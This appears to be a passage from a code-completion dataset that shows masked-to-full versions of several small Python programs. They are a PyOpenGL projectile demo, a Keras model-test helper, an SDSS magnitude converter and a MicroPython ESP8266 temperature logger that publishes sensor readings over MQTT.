0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-3": "<mask token>\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-4": "import time\nimport numpy as np\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom utils import *\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-5": "import time\n\nimport numpy as np\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom utils import *\n\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi/180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin((theta)) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
#!/usr/bin/env python3
'''Testing File'''
import tensorflow.keras as K
def test_model(
network, data, labels, verbose=True
):
'''A Function that tests
a neural network'''
return network.evaluate(
x=data,
y=labels,
verbose=verbose
)
|
normal
|
{
"blob_id": "39643454cbef9e6fa7979d0f660f54e07d155bc7",
"index": 7690,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_model(network, data, labels, verbose=True):\n \"\"\"A Function that tests\n a neural network\"\"\"\n return network.evaluate(x=data, y=labels, verbose=verbose)\n",
"step-3": "<mask token>\nimport tensorflow.keras as K\n\n\ndef test_model(network, data, labels, verbose=True):\n \"\"\"A Function that tests\n a neural network\"\"\"\n return network.evaluate(x=data, y=labels, verbose=verbose)\n",
"step-4": "#!/usr/bin/env python3\n'''Testing File'''\nimport tensorflow.keras as K\n\n\ndef test_model(\n network, data, labels, verbose=True\n):\n '''A Function that tests\n a neural network'''\n return network.evaluate(\n x=data,\n y=labels,\n verbose=verbose\n )\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
''' Converts luptitudes to maggies and stores in folder output
Written by P. Gallardo
'''
import numpy as np
import pandas as pd
import sys
assert len(sys.argv) == 2 # usage: lups2maggies.py /path/to/cat.csv
fname = sys.argv[1]
print("Converting maggies from catalog \n%s" % fname)
df = pd.read_csv(fname)
z = df['z'].values
mod_u = df['cModelMag_u'].values
mod_g = df['cModelMag_g'].values
mod_r = df['cModelMag_r'].values
mod_i = df['cModelMag_i'].values
mod_z = df['cModelMag_z'].values
ext_u = df['extinction_u'].values
ext_g = df['extinction_g'].values
ext_r = df['extinction_r'].values
ext_i = df['extinction_i'].values
ext_z = df['extinction_z'].values
err_u = df['cModelMagErr_u'].values
err_g = df['cModelMagErr_g'].values
err_r = df['cModelMagErr_r'].values
err_i = df['cModelMagErr_i'].values
err_z = df['cModelMagErr_z'].values
dered_u = mod_u - ext_u
dered_g = mod_g - ext_g
dered_r = mod_r - ext_r
dered_i = mod_i - ext_i
dered_z = mod_z - ext_z
b = np.array([1.4, 0.9, 1.2, 1.8, 7.4]) * 1e-10
flux_u = 2.*b[0] * np.sinh(-np.log(10.)/2.5*dered_u-np.log(b[0]))
flux_g = 2.*b[1] * np.sinh(-np.log(10.)/2.5*dered_g-np.log(b[1]))
flux_r = 2.*b[2] * np.sinh(-np.log(10.)/2.5*dered_r-np.log(b[2]))
flux_i = 2.*b[3] * np.sinh(-np.log(10.)/2.5*dered_i-np.log(b[3]))
flux_z = 2.*b[4] * np.sinh(-np.log(10.)/2.5*dered_z-np.log(b[4]))
ivar_u = 2.*b[0]*np.cosh(-np.log(10.)/2.5*dered_u-np.log(b[0]))*(-np.log(10)/2.5)*err_u # noqa
ivar_g = 2.*b[1]*np.cosh(-np.log(10.)/2.5*dered_g-np.log(b[1]))*(-np.log(10)/2.5)*err_g # noqa
ivar_r = 2.*b[2]*np.cosh(-np.log(10.)/2.5*dered_r-np.log(b[2]))*(-np.log(10)/2.5)*err_r # noqa
ivar_i = 2.*b[3]*np.cosh(-np.log(10.)/2.5*dered_i-np.log(b[3]))*(-np.log(10)/2.5)*err_i # noqa
ivar_z = 2.*b[4]*np.cosh(-np.log(10.)/2.5*dered_z-np.log(b[4]))*(-np.log(10)/2.5)*err_z # noqa
ivar_u = 1./ivar_u**2.
ivar_g = 1./ivar_g**2.
ivar_r = 1./ivar_r**2.
ivar_i = 1./ivar_i**2.
ivar_z = 1./ivar_z**2.
to_exp = np.transpose([z, flux_u, flux_g, flux_r, flux_i, flux_z,
ivar_u, ivar_g, ivar_r, ivar_i, ivar_z])
np.savetxt('./output/maggies.txt',
to_exp)
|
normal
|
{
"blob_id": "e8971b3d183ded99a5fc03f031ef807280b8cc7f",
"index": 1744,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nassert len(sys.argv) == 2\n<mask token>\nprint(\"\"\"Converting maggies from catalog \n%s\"\"\" % fname)\n<mask token>\nnp.savetxt('./output/maggies.txt', to_exp)\n",
"step-3": "<mask token>\nassert len(sys.argv) == 2\nfname = sys.argv[1]\nprint(\"\"\"Converting maggies from catalog \n%s\"\"\" % fname)\ndf = pd.read_csv(fname)\nz = df['z'].values\nmod_u = df['cModelMag_u'].values\nmod_g = df['cModelMag_g'].values\nmod_r = df['cModelMag_r'].values\nmod_i = df['cModelMag_i'].values\nmod_z = df['cModelMag_z'].values\next_u = df['extinction_u'].values\next_g = df['extinction_g'].values\next_r = df['extinction_r'].values\next_i = df['extinction_i'].values\next_z = df['extinction_z'].values\nerr_u = df['cModelMagErr_u'].values\nerr_g = df['cModelMagErr_g'].values\nerr_r = df['cModelMagErr_r'].values\nerr_i = df['cModelMagErr_i'].values\nerr_z = df['cModelMagErr_z'].values\ndered_u = mod_u - ext_u\ndered_g = mod_g - ext_g\ndered_r = mod_r - ext_r\ndered_i = mod_i - ext_i\ndered_z = mod_z - ext_z\nb = np.array([1.4, 0.9, 1.2, 1.8, 7.4]) * 1e-10\nflux_u = 2.0 * b[0] * np.sinh(-np.log(10.0) / 2.5 * dered_u - np.log(b[0]))\nflux_g = 2.0 * b[1] * np.sinh(-np.log(10.0) / 2.5 * dered_g - np.log(b[1]))\nflux_r = 2.0 * b[2] * np.sinh(-np.log(10.0) / 2.5 * dered_r - np.log(b[2]))\nflux_i = 2.0 * b[3] * np.sinh(-np.log(10.0) / 2.5 * dered_i - np.log(b[3]))\nflux_z = 2.0 * b[4] * np.sinh(-np.log(10.0) / 2.5 * dered_z - np.log(b[4]))\nivar_u = 2.0 * b[0] * np.cosh(-np.log(10.0) / 2.5 * dered_u - np.log(b[0])) * (\n -np.log(10) / 2.5) * err_u\nivar_g = 2.0 * b[1] * np.cosh(-np.log(10.0) / 2.5 * dered_g - np.log(b[1])) * (\n -np.log(10) / 2.5) * err_g\nivar_r = 2.0 * b[2] * np.cosh(-np.log(10.0) / 2.5 * dered_r - np.log(b[2])) * (\n -np.log(10) / 2.5) * err_r\nivar_i = 2.0 * b[3] * np.cosh(-np.log(10.0) / 2.5 * dered_i - np.log(b[3])) * (\n -np.log(10) / 2.5) * err_i\nivar_z = 2.0 * b[4] * np.cosh(-np.log(10.0) / 2.5 * dered_z - np.log(b[4])) * (\n -np.log(10) / 2.5) * err_z\nivar_u = 1.0 / ivar_u ** 2.0\nivar_g = 1.0 / ivar_g ** 2.0\nivar_r = 1.0 / ivar_r ** 2.0\nivar_i = 1.0 / ivar_i ** 2.0\nivar_z = 1.0 / ivar_z ** 2.0\nto_exp = np.transpose([z, flux_u, flux_g, flux_r, flux_i, flux_z, ivar_u,\n ivar_g, ivar_r, ivar_i, ivar_z])\nnp.savetxt('./output/maggies.txt', to_exp)\n",
"step-4": "<mask token>\nimport numpy as np\nimport pandas as pd\nimport sys\nassert len(sys.argv) == 2\nfname = sys.argv[1]\nprint(\"\"\"Converting maggies from catalog \n%s\"\"\" % fname)\ndf = pd.read_csv(fname)\nz = df['z'].values\nmod_u = df['cModelMag_u'].values\nmod_g = df['cModelMag_g'].values\nmod_r = df['cModelMag_r'].values\nmod_i = df['cModelMag_i'].values\nmod_z = df['cModelMag_z'].values\next_u = df['extinction_u'].values\next_g = df['extinction_g'].values\next_r = df['extinction_r'].values\next_i = df['extinction_i'].values\next_z = df['extinction_z'].values\nerr_u = df['cModelMagErr_u'].values\nerr_g = df['cModelMagErr_g'].values\nerr_r = df['cModelMagErr_r'].values\nerr_i = df['cModelMagErr_i'].values\nerr_z = df['cModelMagErr_z'].values\ndered_u = mod_u - ext_u\ndered_g = mod_g - ext_g\ndered_r = mod_r - ext_r\ndered_i = mod_i - ext_i\ndered_z = mod_z - ext_z\nb = np.array([1.4, 0.9, 1.2, 1.8, 7.4]) * 1e-10\nflux_u = 2.0 * b[0] * np.sinh(-np.log(10.0) / 2.5 * dered_u - np.log(b[0]))\nflux_g = 2.0 * b[1] * np.sinh(-np.log(10.0) / 2.5 * dered_g - np.log(b[1]))\nflux_r = 2.0 * b[2] * np.sinh(-np.log(10.0) / 2.5 * dered_r - np.log(b[2]))\nflux_i = 2.0 * b[3] * np.sinh(-np.log(10.0) / 2.5 * dered_i - np.log(b[3]))\nflux_z = 2.0 * b[4] * np.sinh(-np.log(10.0) / 2.5 * dered_z - np.log(b[4]))\nivar_u = 2.0 * b[0] * np.cosh(-np.log(10.0) / 2.5 * dered_u - np.log(b[0])) * (\n -np.log(10) / 2.5) * err_u\nivar_g = 2.0 * b[1] * np.cosh(-np.log(10.0) / 2.5 * dered_g - np.log(b[1])) * (\n -np.log(10) / 2.5) * err_g\nivar_r = 2.0 * b[2] * np.cosh(-np.log(10.0) / 2.5 * dered_r - np.log(b[2])) * (\n -np.log(10) / 2.5) * err_r\nivar_i = 2.0 * b[3] * np.cosh(-np.log(10.0) / 2.5 * dered_i - np.log(b[3])) * (\n -np.log(10) / 2.5) * err_i\nivar_z = 2.0 * b[4] * np.cosh(-np.log(10.0) / 2.5 * dered_z - np.log(b[4])) * (\n -np.log(10) / 2.5) * err_z\nivar_u = 1.0 / ivar_u ** 2.0\nivar_g = 1.0 / ivar_g ** 2.0\nivar_r = 1.0 / ivar_r ** 2.0\nivar_i = 1.0 / ivar_i ** 2.0\nivar_z = 1.0 / ivar_z ** 2.0\nto_exp = np.transpose([z, flux_u, flux_g, flux_r, flux_i, flux_z, ivar_u,\n ivar_g, ivar_r, ivar_i, ivar_z])\nnp.savetxt('./output/maggies.txt', to_exp)\n",
"step-5": "''' Converts luptitudes to maggies and stores in folder output\n Written by P. Gallardo\n'''\nimport numpy as np\nimport pandas as pd\nimport sys\n\nassert len(sys.argv) == 2 # usage: lups2maggies.py /path/to/cat.csv\nfname = sys.argv[1]\n\nprint(\"Converting maggies from catalog \\n%s\" % fname)\n\ndf = pd.read_csv(fname)\n\nz = df['z'].values\n\nmod_u = df['cModelMag_u'].values\nmod_g = df['cModelMag_g'].values\nmod_r = df['cModelMag_r'].values\nmod_i = df['cModelMag_i'].values\nmod_z = df['cModelMag_z'].values\n\next_u = df['extinction_u'].values\next_g = df['extinction_g'].values\next_r = df['extinction_r'].values\next_i = df['extinction_i'].values\next_z = df['extinction_z'].values\n\nerr_u = df['cModelMagErr_u'].values\nerr_g = df['cModelMagErr_g'].values\nerr_r = df['cModelMagErr_r'].values\nerr_i = df['cModelMagErr_i'].values\nerr_z = df['cModelMagErr_z'].values\n\n\ndered_u = mod_u - ext_u\ndered_g = mod_g - ext_g\ndered_r = mod_r - ext_r\ndered_i = mod_i - ext_i\ndered_z = mod_z - ext_z\n\nb = np.array([1.4, 0.9, 1.2, 1.8, 7.4]) * 1e-10\nflux_u = 2.*b[0] * np.sinh(-np.log(10.)/2.5*dered_u-np.log(b[0]))\nflux_g = 2.*b[1] * np.sinh(-np.log(10.)/2.5*dered_g-np.log(b[1]))\nflux_r = 2.*b[2] * np.sinh(-np.log(10.)/2.5*dered_r-np.log(b[2]))\nflux_i = 2.*b[3] * np.sinh(-np.log(10.)/2.5*dered_i-np.log(b[3]))\nflux_z = 2.*b[4] * np.sinh(-np.log(10.)/2.5*dered_z-np.log(b[4]))\n\n\nivar_u = 2.*b[0]*np.cosh(-np.log(10.)/2.5*dered_u-np.log(b[0]))*(-np.log(10)/2.5)*err_u # noqa\nivar_g = 2.*b[1]*np.cosh(-np.log(10.)/2.5*dered_g-np.log(b[1]))*(-np.log(10)/2.5)*err_g # noqa\nivar_r = 2.*b[2]*np.cosh(-np.log(10.)/2.5*dered_r-np.log(b[2]))*(-np.log(10)/2.5)*err_r # noqa\nivar_i = 2.*b[3]*np.cosh(-np.log(10.)/2.5*dered_i-np.log(b[3]))*(-np.log(10)/2.5)*err_i # noqa\nivar_z = 2.*b[4]*np.cosh(-np.log(10.)/2.5*dered_z-np.log(b[4]))*(-np.log(10)/2.5)*err_z # noqa\n\nivar_u = 1./ivar_u**2.\nivar_g = 1./ivar_g**2.\nivar_r = 1./ivar_r**2.\nivar_i = 1./ivar_i**2.\nivar_z = 1./ivar_z**2.\n\nto_exp = np.transpose([z, flux_u, flux_g, flux_r, flux_i, flux_z,\n ivar_u, ivar_g, ivar_r, ivar_i, ivar_z])\nnp.savetxt('./output/maggies.txt',\n to_exp)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Error(Exception):
pass
class Warning(Exception):
pass
def gettimestr():
rtc = machine.RTC()
curtime = rtc.datetime()
_time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2
] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]
return _time
def deepsleep():
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
rtc.alarm(rtc.ALARM0, 60000)
machine.deepsleep()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Error(Exception):
pass
class Warning(Exception):
pass
def gettimestr():
rtc = machine.RTC()
curtime = rtc.datetime()
_time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2
] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]
return _time
def deepsleep():
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
rtc.alarm(rtc.ALARM0, 60000)
machine.deepsleep()
<|reserved_special_token_0|>
def timercallback(tim):
global timer_index
if timer_index == 0:
print('Timer reached 0, something went wrong -> sleep.')
deepsleep()
print('Timer index ' + str(timer_index))
timer_index = timer_index - 1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Error(Exception):
pass
class Warning(Exception):
pass
def gettimestr():
rtc = machine.RTC()
curtime = rtc.datetime()
_time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2
] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]
return _time
def deepsleep():
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
rtc.alarm(rtc.ALARM0, 60000)
machine.deepsleep()
<|reserved_special_token_0|>
def timercallback(tim):
global timer_index
if timer_index == 0:
print('Timer reached 0, something went wrong -> sleep.')
deepsleep()
print('Timer index ' + str(timer_index))
timer_index = timer_index - 1
<|reserved_special_token_0|>
if stoppin.value() == 0:
print('Pin down, stop')
else:
try:
tim = Timer(-1)
tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)
try:
f = open('config.json', 'r')
config = ujson.loads(f.readall())
except OSError as e:
if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:
print('I/O error({0}): {1}'.format(e.args[0], e.args[1]))
raise Error
ONEWIREPIN = config['ONEWIREPIN']
dat = machine.Pin(ONEWIREPIN)
ds = ds18x20.DS18X20(onewire.OneWire(dat))
roms = ds.scan()
print('found devices:', roms)
if len(roms) > 0:
ds.convert_temp()
time.sleep_ms(750)
print('Check wifi connection.')
wifi = network.WLAN(network.STA_IF)
i = 0
while not wifi.isconnected():
if i > 10:
print('No wifi connection.')
raise Warning
print('.')
time.sleep(1)
i = i + 1
try:
print('Get time.')
ntptime.settime()
except OSError as e:
if e.args[0] == errno.ETIMEDOUT:
print("Timeout error, didn't get ntptime.")
if machine.reset_cause() != machine.DEEPSLEEP:
raise Warning
if e.args[0] == -2:
print("DNS error, didn't get ntptime.")
if machine.reset_cause() != machine.DEEPSLEEP:
raise Warning
else:
raise
_time = gettimestr()
print('Open MQTT connection.')
c = MQTTClient('umqtt_client', config['MQTT_BROKER'])
c.connect()
if config['MEASURE_VOLTAGE']:
adc = machine.ADC(0)
voltage = adc.read()
topic = 'raw/esp8266/' + ubinascii.hexlify(machine.unique_id()
).decode() + '/voltage'
message = _time + ' ' + str(voltage)
c.publish(topic, message)
for rom in roms:
print('topic ' + config['MQTT_TOPIC'] + ubinascii.hexlify(rom).
decode())
topic = config['MQTT_TOPIC'] + ubinascii.hexlify(rom).decode(
) + '/temperature'
print(_time)
print(ds.read_temp(rom))
message = _time + ' ' + str(ds.read_temp(rom))
c.publish(topic, message)
c.disconnect()
deepsleep()
except Warning:
deepsleep()
except Error:
print('Error({0}): {1}'.format(e.args[0], e.args[1]))
<|reserved_special_token_1|>
import time
import machine
from machine import Timer
import network
import onewire, ds18x20
import ujson
import ubinascii
from umqtt.simple import MQTTClient
import ntptime
import errno
class Error(Exception):
pass
class Warning(Exception):
pass
def gettimestr():
rtc = machine.RTC()
curtime = rtc.datetime()
_time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2
] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]
return _time
def deepsleep():
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
rtc.alarm(rtc.ALARM0, 60000)
machine.deepsleep()
timer_index = 20
def timercallback(tim):
global timer_index
if timer_index == 0:
print('Timer reached 0, something went wrong -> sleep.')
deepsleep()
print('Timer index ' + str(timer_index))
timer_index = timer_index - 1
stoppin = machine.Pin(4, mode=machine.Pin.IN, pull=machine.Pin.PULL_UP)
if stoppin.value() == 0:
print('Pin down, stop')
else:
try:
tim = Timer(-1)
tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)
try:
f = open('config.json', 'r')
config = ujson.loads(f.readall())
except OSError as e:
if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:
print('I/O error({0}): {1}'.format(e.args[0], e.args[1]))
raise Error
ONEWIREPIN = config['ONEWIREPIN']
dat = machine.Pin(ONEWIREPIN)
ds = ds18x20.DS18X20(onewire.OneWire(dat))
roms = ds.scan()
print('found devices:', roms)
if len(roms) > 0:
ds.convert_temp()
time.sleep_ms(750)
print('Check wifi connection.')
wifi = network.WLAN(network.STA_IF)
i = 0
while not wifi.isconnected():
if i > 10:
print('No wifi connection.')
raise Warning
print('.')
time.sleep(1)
i = i + 1
try:
print('Get time.')
ntptime.settime()
except OSError as e:
if e.args[0] == errno.ETIMEDOUT:
print("Timeout error, didn't get ntptime.")
if machine.reset_cause() != machine.DEEPSLEEP:
raise Warning
if e.args[0] == -2:
print("DNS error, didn't get ntptime.")
if machine.reset_cause() != machine.DEEPSLEEP:
raise Warning
else:
raise
_time = gettimestr()
print('Open MQTT connection.')
c = MQTTClient('umqtt_client', config['MQTT_BROKER'])
c.connect()
if config['MEASURE_VOLTAGE']:
adc = machine.ADC(0)
voltage = adc.read()
topic = 'raw/esp8266/' + ubinascii.hexlify(machine.unique_id()
).decode() + '/voltage'
message = _time + ' ' + str(voltage)
c.publish(topic, message)
for rom in roms:
print('topic ' + config['MQTT_TOPIC'] + ubinascii.hexlify(rom).
decode())
topic = config['MQTT_TOPIC'] + ubinascii.hexlify(rom).decode(
) + '/temperature'
print(_time)
print(ds.read_temp(rom))
message = _time + ' ' + str(ds.read_temp(rom))
c.publish(topic, message)
c.disconnect()
deepsleep()
except Warning:
deepsleep()
except Error:
print('Error({0}): {1}'.format(e.args[0], e.args[1]))
<|reserved_special_token_1|>
import time
import machine
from machine import Timer
import network
import onewire, ds18x20
import ujson
import ubinascii
from umqtt.simple import MQTTClient
import ntptime
import errno
#Thrown if an error that is fatal occurs,
#stop measurement cycle.
class Error(Exception):
pass
#Thrown if an error that is not fatal occurs,
#goes to deep sleep and continues as normal.
#For example no wifi connection at this time.
class Warning(Exception):
pass
def gettimestr():
rtc=machine.RTC()
curtime=rtc.datetime()
_time="%04d" % curtime[0]+ "%02d" % curtime[1]+ "%02d" % curtime[2]+" "+ "%02d" % curtime[4]+ "%02d" % curtime[5]
return _time
def deepsleep():
# configure RTC.ALARM0 to be able to wake the device
rtc = machine.RTC()
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
# set RTC.ALARM0 to fire after 60 seconds (waking the device)
rtc.alarm(rtc.ALARM0, 60000)
# put the device to sleep
machine.deepsleep()
timer_index=20
def timercallback(tim):
global timer_index
if timer_index==0:
print("Timer reached 0, something went wrong -> sleep.")
deepsleep()
print("Timer index "+str(timer_index))
timer_index=timer_index-1
#check if gpio4 is pulled down
stoppin = machine.Pin(4,mode=machine.Pin.IN,pull=machine.Pin.PULL_UP)
if stoppin.value()==0:
print("Pin down, stop")
else:
try:
#normal loop
tim = Timer(-1)
tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)
try:
f = open('config.json', 'r')
config = ujson.loads(f.readall())
except OSError as e:
if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:
print("I/O error({0}): {1}".format(e.args[0], e.args[1]))
raise Error
# the device is on GPIOxx
ONEWIREPIN = config['ONEWIREPIN']
dat = machine.Pin(ONEWIREPIN)
# create the onewire object
ds = ds18x20.DS18X20(onewire.OneWire(dat))
# scan for devices on the bus
roms = ds.scan()
print('found devices:', roms)
if (len(roms)>0):
ds.convert_temp()
time.sleep_ms(750)
# Check if we have wifi, and wait for connection if not.
print("Check wifi connection.")
wifi = network.WLAN(network.STA_IF)
i = 0
while not wifi.isconnected():
if (i>10):
print("No wifi connection.")
raise Warning
print(".")
time.sleep(1)
i=i+1
try:
print("Get time.")
ntptime.settime()
except OSError as e:
if e.args[0] == errno.ETIMEDOUT: #OSError: [Errno 110] ETIMEDOUT
print("Timeout error, didn't get ntptime.")
#if we did not wake up from deep sleep
#we cannot continue until we get correct time
if (machine.reset_cause()!=machine.DEEPSLEEP):
raise Warning
if e.args[0] == -2: #OSError: dns error
print("DNS error, didn't get ntptime.")
#if we did not wake up from deep sleep
#we cannot continue until we get correct time
if (machine.reset_cause()!=machine.DEEPSLEEP):
raise Warning
else:
raise
_time=gettimestr()
print("Open MQTT connection.")
c = MQTTClient("umqtt_client", config['MQTT_BROKER'])
c.connect()
#check battery voltage?
if (config['MEASURE_VOLTAGE']):
adc = machine.ADC(0)
voltage = adc.read();
topic="raw/esp8266/"+ubinascii.hexlify(machine.unique_id()).decode()+"/voltage"
message=_time+" "+str(voltage)
c.publish(topic,message)
#loop ds18b20 and send results to mqtt broker
for rom in roms:
print("topic "+config['MQTT_TOPIC']+ubinascii.hexlify(rom).decode())
topic=config['MQTT_TOPIC']+ubinascii.hexlify(rom).decode()+"/temperature"
print(_time)
print(ds.read_temp(rom))
message=_time+' '+str(ds.read_temp(rom))
c.publish(topic,message)
c.disconnect()
deepsleep()
except Warning:
deepsleep()
except Error:
print("Error({0}): {1}".format(e.args[0], e.args[1]))
|
flexible
|
{
"blob_id": "b934770e9e57a0ead124e245f394433ce853dec9",
"index": 8691,
"step-1": "<mask token>\n\n\nclass Error(Exception):\n pass\n\n\nclass Warning(Exception):\n pass\n\n\ndef gettimestr():\n rtc = machine.RTC()\n curtime = rtc.datetime()\n _time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2\n ] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]\n return _time\n\n\ndef deepsleep():\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, 60000)\n machine.deepsleep()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Error(Exception):\n pass\n\n\nclass Warning(Exception):\n pass\n\n\ndef gettimestr():\n rtc = machine.RTC()\n curtime = rtc.datetime()\n _time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2\n ] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]\n return _time\n\n\ndef deepsleep():\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, 60000)\n machine.deepsleep()\n\n\n<mask token>\n\n\ndef timercallback(tim):\n global timer_index\n if timer_index == 0:\n print('Timer reached 0, something went wrong -> sleep.')\n deepsleep()\n print('Timer index ' + str(timer_index))\n timer_index = timer_index - 1\n\n\n<mask token>\n",
